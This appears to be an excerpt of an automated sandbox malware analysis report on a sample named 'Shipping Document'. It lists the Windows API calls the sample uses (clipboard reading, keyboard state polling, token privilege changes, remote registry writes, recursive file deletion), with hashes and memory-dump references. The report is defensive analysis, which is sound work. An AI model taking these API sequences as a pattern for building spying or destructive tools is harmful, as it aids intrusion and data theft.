                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 4125248594-2988720461
                              • Opcode ID: 2083cab603aae1556ece71562a545e63597b45ebb9a712245bafcf7b99d075a3
                              • Instruction ID: 14f72b0facbe07754ba3db60e6e61433e768529b22ed09ef54b63158d704d455
                              • Opcode Fuzzy Hash: 2083cab603aae1556ece71562a545e63597b45ebb9a712245bafcf7b99d075a3
                              • Instruction Fuzzy Hash: D7319FB5A8031CBBEB306FA59D89F7F3E6CEF44B60F104015FB00EA190C6B55900ABA4
                              APIs
                                • Part of subcall function 01018CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01018D0D
                                • Part of subcall function 01018CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01018D3A
                                • Part of subcall function 01018CC3: GetLastError.KERNEL32 ref: 01018D47
                              • _memset.LIBCMT ref: 0101889B
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 010188ED
                              • CloseHandle.KERNEL32(?), ref: 010188FE
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01018915
                              • GetProcessWindowStation.USER32 ref: 0101892E
                              • SetProcessWindowStation.USER32(00000000), ref: 01018938
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01018952
                                • Part of subcall function 01018713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01018851), ref: 01018728
                                • Part of subcall function 01018713: CloseHandle.KERNEL32(?,?,01018851), ref: 0101873A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                              • String ID: $default$winsta0
                              • API String ID: 2063423040-1027155976
                              • Opcode ID: 2f03aa79325b7af01cb9e1391307396d2fbfbe60832a8de22f521c339da7bf99
                              • Instruction ID: f2d3a18f4916b2dc3e1a93db0dfca67da4432a8bfc9c5aac7206bb24898925b7
                              • Opcode Fuzzy Hash: 2f03aa79325b7af01cb9e1391307396d2fbfbe60832a8de22f521c339da7bf99
                              • Instruction Fuzzy Hash: 36814FB6D0024ABFEF11DFA8DD44AEE7BB8FF05305F08815AF990A6154D7398A14DB60
                              APIs
                              • OpenClipboard.USER32(0104F910), ref: 01034284
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 01034292
                              • GetClipboardData.USER32(0000000D), ref: 0103429A
                              • CloseClipboard.USER32 ref: 010342A6
                              • GlobalLock.KERNEL32(00000000), ref: 010342C2
                              • CloseClipboard.USER32 ref: 010342CC
                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 010342E1
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 010342EE
                              • GetClipboardData.USER32(00000001), ref: 010342F6
                              • GlobalLock.KERNEL32(00000000), ref: 01034303
                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 01034337
                              • CloseClipboard.USER32 ref: 01034447
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                              • String ID:
                              • API String ID: 3222323430-0
                              • Opcode ID: e28a9b5ff094c309f25d7cae2b2ac6b647dcdfb2250f66e6a6a4a28474e3dc27
                              • Instruction ID: 2d3aa62b0cd9c0d04471d6c602c5da866f350841dd73c84835b4a5c419731c37
                              • Opcode Fuzzy Hash: e28a9b5ff094c309f25d7cae2b2ac6b647dcdfb2250f66e6a6a4a28474e3dc27
                              • Instruction Fuzzy Hash: 58518FB9204303ABD311AF69EE86F6E77ACAF84B00F004529F5D6D6191DF79D9048B62
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 0102C9F8
                              • FindClose.KERNEL32(00000000), ref: 0102CA4C
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0102CA71
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0102CA88
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0102CAAF
                              • __swprintf.LIBCMT ref: 0102CAFB
                              • __swprintf.LIBCMT ref: 0102CB3E
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                              • __swprintf.LIBCMT ref: 0102CB92
                                • Part of subcall function 00FE38D8: __woutput_l.LIBCMT ref: 00FE3931
                              • __swprintf.LIBCMT ref: 0102CBE0
                                • Part of subcall function 00FE38D8: __flsbuf.LIBCMT ref: 00FE3953
                                • Part of subcall function 00FE38D8: __flsbuf.LIBCMT ref: 00FE396B
                              • __swprintf.LIBCMT ref: 0102CC2F
                              • __swprintf.LIBCMT ref: 0102CC7E
                              • __swprintf.LIBCMT ref: 0102CCCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 3953360268-2428617273
                              • Opcode ID: c1e10f2127ab2917a274ded19ce4acc0b80eec05fecd2deba20229771951605d
                              • Instruction ID: 04800fd5ec1c840ba9d975b6d8d15e96aed7afb9b3e2009d7fd6e85c1f907847
                              • Opcode Fuzzy Hash: c1e10f2127ab2917a274ded19ce4acc0b80eec05fecd2deba20229771951605d
                              • Instruction Fuzzy Hash: 7CA15FB2408345ABD710EB65CE86EAFB7ECAF84700F40491DF585C3191EB78DA08DB62
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0102F221
                              • _wcscmp.LIBCMT ref: 0102F236
                              • _wcscmp.LIBCMT ref: 0102F24D
                              • GetFileAttributesW.KERNEL32(?), ref: 0102F25F
                              • SetFileAttributesW.KERNEL32(?,?), ref: 0102F279
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0102F291
                              • FindClose.KERNEL32(00000000), ref: 0102F29C
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0102F2B8
                              • _wcscmp.LIBCMT ref: 0102F2DF
                              • _wcscmp.LIBCMT ref: 0102F2F6
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0102F308
                              • SetCurrentDirectoryW.KERNEL32(0107A5A0), ref: 0102F326
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0102F330
                              • FindClose.KERNEL32(00000000), ref: 0102F33D
                              • FindClose.KERNEL32(00000000), ref: 0102F34F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1803514871-438819550
                              • Opcode ID: 60c071c229fd0a523425075cadbbba6cf034fa3a5a88ad1f9ad5fea67eea62dd
                              • Instruction ID: 686070ed8eac03766aafa56be816abe9fc7ff8f429e043015ccfc10f2b6a7368
                              • Opcode Fuzzy Hash: 60c071c229fd0a523425075cadbbba6cf034fa3a5a88ad1f9ad5fea67eea62dd
                              • Instruction Fuzzy Hash: 5931F97660022B6FDB20DAB9DC9CEDE7BFC9F092A1F148195E980D3050EB35DA45CB64
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040BDE
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0104F910,00000000,?,00000000,?,?), ref: 01040C4C
                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01040C94
                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01040D1D
                              • RegCloseKey.ADVAPI32(?), ref: 0104103D
                              • RegCloseKey.ADVAPI32(00000000), ref: 0104104A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Close$ConnectCreateRegistryValue
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 536824911-966354055
                              • Opcode ID: 333b8d59b60993ac98a7442f00ab62e0a734f0b0de0cb5ff55baacc40407a6e2
                              • Instruction ID: 5644c0fb82c1db8ac7f48d6071cf2f06e349d3268ace53f17e3408ee76d3b2dc
                              • Opcode Fuzzy Hash: 333b8d59b60993ac98a7442f00ab62e0a734f0b0de0cb5ff55baacc40407a6e2
                              • Instruction Fuzzy Hash: EB028D752046029FCB14EF29C985E2AB7E5FF88710F05846DF98A9B761CB79EC40DB81
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0102F37E
                              • _wcscmp.LIBCMT ref: 0102F393
                              • _wcscmp.LIBCMT ref: 0102F3AA
                                • Part of subcall function 010245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010245DC
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0102F3D9
                              • FindClose.KERNEL32(00000000), ref: 0102F3E4
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0102F400
                              • _wcscmp.LIBCMT ref: 0102F427
                              • _wcscmp.LIBCMT ref: 0102F43E
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0102F450
                              • SetCurrentDirectoryW.KERNEL32(0107A5A0), ref: 0102F46E
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0102F478
                              • FindClose.KERNEL32(00000000), ref: 0102F485
                              • FindClose.KERNEL32(00000000), ref: 0102F497
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 1824444939-438819550
                              • Opcode ID: e903157c0471cabe1a25a234ac2d283f1b97de4a99cf8da0490ca80ea98ae7bd
                              • Instruction ID: 3939c2a3638435939f8bf36f501735eaf98bf1be64ee9c045d5c057bac3ef404
                              • Opcode Fuzzy Hash: e903157c0471cabe1a25a234ac2d283f1b97de4a99cf8da0490ca80ea98ae7bd
                              • Instruction Fuzzy Hash: C631FA7550122B6FDB20AA79DC88ADE7BFC9F092A1F144195E9C0D3090DB75DA44CB64
                              APIs
                                • Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01018766
                                • Part of subcall function 0101874A: GetLastError.KERNEL32(?,0101822A,?,?,?), ref: 01018770
                                • Part of subcall function 0101874A: GetProcessHeap.KERNEL32(00000008,?,?,0101822A,?,?,?), ref: 0101877F
                                • Part of subcall function 0101874A: HeapAlloc.KERNEL32(00000000,?,0101822A,?,?,?), ref: 01018786
                                • Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101879D
                                • Part of subcall function 010187E7: GetProcessHeap.KERNEL32(00000008,01018240,00000000,00000000,?,01018240,?), ref: 010187F3
                                • Part of subcall function 010187E7: HeapAlloc.KERNEL32(00000000,?,01018240,?), ref: 010187FA
                                • Part of subcall function 010187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01018240,?), ref: 0101880B
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0101825B
                              • _memset.LIBCMT ref: 01018270
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101828F
                              • GetLengthSid.ADVAPI32(?), ref: 010182A0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 010182DD
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010182F9
                              • GetLengthSid.ADVAPI32(?), ref: 01018316
                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01018325
                              • HeapAlloc.KERNEL32(00000000), ref: 0101832C
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0101834D
                              • CopySid.ADVAPI32(00000000), ref: 01018354
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01018385
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010183AB
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 010183BF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                              • String ID:
                              • API String ID: 3996160137-0
                              • Opcode ID: 7d7c97a0aaa8a2bdcd1d8b958af619b8327b0464e6248441c246e5fdda5ad538
                              • Instruction ID: cbc3c99b3c2c163c81f0aa440f22402fb584fbc30612cffd72df5bc753cf1182
                              • Opcode Fuzzy Hash: 7d7c97a0aaa8a2bdcd1d8b958af619b8327b0464e6248441c246e5fdda5ad538
                              • Instruction Fuzzy Hash: 0F617C7590020AAFDF14DFA8DD84AEEBBB9FF04200F04C15AF955A7294DB399A01DB60
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                              • API String ID: 0-4052911093
                              • Opcode ID: d73192275475527b772414cfc022a9a27a5cebfc8bd198e66f15e2178d571af4
                              • Instruction ID: e5c79fd77671ef6b50e43699bc5fdbddfce0d7b9d3d395c88f89725d30e1da84
                              • Opcode Fuzzy Hash: d73192275475527b772414cfc022a9a27a5cebfc8bd198e66f15e2178d571af4
                              • Instruction Fuzzy Hash: 81727271E00219DBDB18CF68D8807ADB7F6FF48310F1881AAE999EB394D7749941DB90
                              APIs
                                • Part of subcall function 010410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040737
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 010407D6
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0104086E
                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01040AAD
                              • RegCloseKey.ADVAPI32(00000000), ref: 01040ABA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                              • String ID:
                              • API String ID: 1240663315-0
                              • Opcode ID: d724de7aa8508871a2ff81a3c1cb7e457701f4b7002356bdf29c6a98580430b6
                              • Instruction ID: f70d9755ba02cd4900e7ca3394f76d2c4441ee153bae463e918ddd4d3ef57441
                              • Opcode Fuzzy Hash: d724de7aa8508871a2ff81a3c1cb7e457701f4b7002356bdf29c6a98580430b6
                              • Instruction Fuzzy Hash: 9FE17D71204201AFCB14DF29C985E6ABBE8FF88714F04896DF58ADB265DB35ED01CB52
                              APIs
                              • GetKeyboardState.USER32(?), ref: 01020241
                              • GetAsyncKeyState.USER32(000000A0), ref: 010202C2
                              • GetKeyState.USER32(000000A0), ref: 010202DD
                              • GetAsyncKeyState.USER32(000000A1), ref: 010202F7
                              • GetKeyState.USER32(000000A1), ref: 0102030C
                              • GetAsyncKeyState.USER32(00000011), ref: 01020324
                              • GetKeyState.USER32(00000011), ref: 01020336
                              • GetAsyncKeyState.USER32(00000012), ref: 0102034E
                              • GetKeyState.USER32(00000012), ref: 01020360
                              • GetAsyncKeyState.USER32(0000005B), ref: 01020378
                              • GetKeyState.USER32(0000005B), ref: 0102038A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: 4e4376f95228cecdb01f4a859161e98994454f8e2af295aceb2d645ca9fe7fc6
                              • Instruction ID: 16d72109504159aa8d68255a0692aa95314a5acb8e9e5675f0c02747c5431e97
                              • Opcode Fuzzy Hash: 4e4376f95228cecdb01f4a859161e98994454f8e2af295aceb2d645ca9fe7fc6
                              • Instruction Fuzzy Hash: 9241D9746047DA6FFFB28A6C84043A6BEE46F02340F08C0DEE6C6461C7E7A555C887A2
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: 4edd8424470326145187b7c63c67b6918bbfcc0992eb6f8fa72c19e5646d80ce
                              • Instruction ID: ff00440354aff274a7889ec3aa26606ad20f242f3b4e5cee167302bf36aa03d2
                              • Opcode Fuzzy Hash: 4edd8424470326145187b7c63c67b6918bbfcc0992eb6f8fa72c19e5646d80ce
                              • Instruction Fuzzy Hash: A221C9793006129FDB219F69ED49F6E77A8EF44711F00805AF9C6CB2A5CB7AAD00CB54
                              APIs
                                • Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE
                                • Part of subcall function 01024CD3: GetFileAttributesW.KERNEL32(?,01023947), ref: 01024CD4
                              • FindFirstFileW.KERNEL32(?,?), ref: 01023ADF
                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 01023B87
                              • MoveFileW.KERNEL32(?,?), ref: 01023B9A
                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01023BB7
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 01023BD9
                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 01023BF5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                              • String ID: \*.*
                              • API String ID: 4002782344-1173974218
                              • Opcode ID: e809285fdd4d1f4d859d581d2092fc540d561f50c790a3872bbc04e4bee407c0
                              • Instruction ID: 8d728da8082c0e0aacb50baf8b73efd5e22c0386ce3ecf41c9f253a5613f705c
                              • Opcode Fuzzy Hash: e809285fdd4d1f4d859d581d2092fc540d561f50c790a3872bbc04e4bee407c0
                              • Instruction Fuzzy Hash: F851633180125E9ACF15FBA4CE93EEDB7B9AF18300F6441A9E58177091DF296F09DB60
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0102F6AB
                              • Sleep.KERNEL32(0000000A), ref: 0102F6DB
                              • _wcscmp.LIBCMT ref: 0102F6EF
                              • _wcscmp.LIBCMT ref: 0102F70A
                              • FindNextFileW.KERNEL32(?,?), ref: 0102F7A8
                              • FindClose.KERNEL32(00000000), ref: 0102F7BE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                              • String ID: *.*
                              • API String ID: 713712311-438819550
                              • Opcode ID: b96f26b71a3398369e53755199956d194531c205281088f395129195008c141f
                              • Instruction ID: b4511ec4f0967d16eae9e63b47c205abb70f5c38c89cfd50c0269488e35bf9cb
                              • Opcode Fuzzy Hash: b96f26b71a3398369e53755199956d194531c205281088f395129195008c141f
                              • Instruction Fuzzy Hash: 6F41AF7190021B9FDF61EF68CD89EEEBBB4FF05350F14459AE894A3190DB359A44CB90
                              Strings
                              Memory Dump Source
